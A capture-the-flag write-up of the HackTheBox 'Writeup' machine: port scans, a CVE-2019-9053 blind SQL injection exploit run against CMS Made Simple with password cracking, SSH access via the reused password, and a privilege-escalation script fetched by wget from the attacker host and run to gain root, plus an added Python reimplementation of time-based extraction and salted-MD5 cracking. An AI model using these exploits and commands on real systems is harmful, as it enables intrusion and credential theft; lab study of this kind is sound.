title: HackTheBox-Writeup author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Writeup.png tags:
- Linux
Crazy:~/HackThebox/Writeup$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.138
[sudo] password for crazyinside:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 01:11:31 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.138
Discovered open port 80/tcp on 10.10.10.138
Crazy:~/HackThebox/Writeup$ sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
[sudo] password for crazyinside:
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 09:13 CST
Nmap scan report for 10.10.10.138
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd5310700bd0470ae27e4ab6429823c7 (RSA)
| 256 372e1468aeb9c2342b6ed992bcbfbd28 (ECDSA)
|_ 256 93eaa84042c1a83385b35600621ca0ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
zsh: segmentation fault sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
Crazy:~/HackThebox/Writeup$ curl http://10.10.10.138/robots.txt
# __
# _( |@@|
# (__/__ --/ __
# ___|----| | __
# }{ / )_ / _
# /__/ __O (__
# (--/--) __/
# _)( )(_
# `---''---`
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
Crazy:~/HackThebox/Writeup$
Crazy:~/HackThebox/Writeup$ whatweb http://10.10.10.138/writeup/
http://10.10.10.138/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.10.10.138], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]
whatweb identifies CMS Made Simple, but no exact version is exposed; the MetaGenerator copyright only tells us the build dates from 2019 or later.
Crazy:~/HackThebox/Writeup$ searchsploit CMS Made Simple
------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload | php/webapps/46546.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
------------------------------------------------------------------------------------------------------ ---------------------------------
Paper Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple v2.2.13 - Paper | docs/english/49947-cms-made-simp
------------------------------------------------------------------------------------------------------ ---------------------------------
The relevant entry is the unauthenticated SQL injection in CMS Made Simple < 2.2.10, php/webapps/46635.py, tracked as CVE-2019-9053. The bundled script is written for Python 2 and does not run as-is; 4nner maintains a Python 3 port on GitHub:
https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py
./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
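The exploit output above has two stages: a blind, time-based SQL injection that leaks the salt, username and password hash one character at a time, and an offline crack of that hash against rockyou. The following is an added example, not code from the blog post or from the 4nner script, that rebuilds both stages against a constructed in-memory target so it runs offline. The real exploit appends a conditional SLEEP() to the News module's m1_idlist parameter and treats a slow response as "prefix correct"; here that round trip is replaced by a local oracle function. The salted_md5 routine reproduces what the --crack option does (CMS Made Simple 2.2.x stores md5(sitemask salt + password)); FAKE_DB, SAMPLE_WORDLIST, SLEEP and the function names are this example's own assumptions.

```python
"""Added example: blind time-based extraction plus salted-MD5 cracking,
modelled on CVE-2019-9053 but run against a constructed local target."""
import hashlib
import string
import time
from typing import Callable, Iterable, Optional

# Constructed stand-in for the rows the injection reads. Only the salt and
# username mirror the output above; nothing here is fetched from a box.
FAKE_DB = {
    "sitemask": "5a599ef579066807",
    "username": "jkr",
    "email": "jkr@writeup.htb",
}

SLEEP = 0.01  # seconds; the real exploit injects whole-second SLEEP() calls


def time_oracle(column: str, prefix: str) -> bool:
    """The only question a time-based injection can ask: did the request
    take noticeably longer than normal? (Simulates
    `... AND (SELECT SLEEP(n) ... WHERE value LIKE 'prefix%')`.)"""
    start = time.monotonic()
    if FAKE_DB[column].startswith(prefix):
        time.sleep(SLEEP)
    # Threshold below the injected delay, as real exploits do, so jitter on
    # the "no sleep" path never flips the answer.
    return time.monotonic() - start >= SLEEP / 2


# Hex salts, logins and e-mail addresses. MySQL LIKE is case-insensitive on
# the default collation, so lowercase guesses also match mixed-case data.
ALPHABET = string.digits + string.ascii_lowercase + "@._-"


def extract(column: str, oracle: Callable[[str, str], bool],
            alphabet: str = ALPHABET, max_len: int = 64) -> str:
    """Recover a value one character at a time by growing a confirmed prefix."""
    found = ""
    for _ in range(max_len):
        for ch in alphabet:
            # In a real payload '%' and '_' would need LIKE-escaping; the
            # alphabet here deliberately leaves them out.
            if oracle(column, found + ch):
                found += ch
                break
        else:
            break  # no candidate extends the prefix: the value is complete
    return found


def salted_md5(salt: str, password: str) -> str:
    """CMS Made Simple 2.2.x password storage: md5(salt . password)."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def crack(salt: str, target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack using the leaked salt; None if no candidate matches."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if salted_md5(salt, candidate) == target_hash:
            return candidate
    return None


# Constructed four-entry stand-in for rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "raykayjay9", "letmein"]


def run_demo():
    """Leak salt and user through the oracle, then crack a hash built from
    the known password (the real attack leaks the hash the same way)."""
    salt = extract("sitemask", time_oracle)
    user = extract("username", time_oracle)
    leaked_hash = salted_md5(salt, "raykayjay9")
    return salt, user, crack(salt, leaked_hash, SAMPLE_WORDLIST)


if __name__ == "__main__":
    salt, user, password = run_demo()
    print(f"[+] salt={salt} user={user} password={password}")
```

Two practical points follow from the code. Extraction cost scales with the alphabet size times the value length, which is why the real script restricts its character set and why a longer SLEEP() makes the attack slower but more reliable over a 200 ms link like the one in the nmap output. And the crack is cheap only because the salt was leaked alongside the hash: without it, a dictionary attack on md5(salt . password) would have to guess the salt as well.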
The cracked CMS password is reused for SSH (writeup.htb resolves to 10.10.10.138 via /etc/hosts):
Crazy:~/HackThebox/Writeup$ ssh jkr@writeup.htb
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 21 21:49:32 2022 from 10.10.16.5
jkr@writeup:~$ sudo -l
-bash: sudo: command not found
jkr@writeup:~$ cat user.txt
fe...................................
jkr@writeup:~$
jkr@writeup:~$ wget http://10.10.16.3/pwk.py
--2022-08-21 21:51:50-- http://10.10.16.3/pwk.py
Connecting to 10.10.16.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: ‘pwk.py’
pwk.py 100%[=============================================================>] 3.37K --.-KB/s in 0.01s
2022-08-21 21:51:51 (236 KB/s) - ‘pwk.py’ saved [3448/3448]
jkr@writeup:~$ ls
pwk.py sharedvuln user.txt
jkr@writeup:~$ python pwk.py
File "pwk.py", line 43
cargv = (c_char_p * (len(argv) + 1))(*argv, None)
SyntaxError: only named arguments may follow *expression
The box's default python is Python 2, which rejects that call syntax; the script is written for Python 3:
jkr@writeup:~$ python3 pwk.py
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev),1000(jkr)
# cat /root/root.txt
bf84..............................
#
Originally published on the WeChat official account 老鑫安全: HackTheBox-Writeup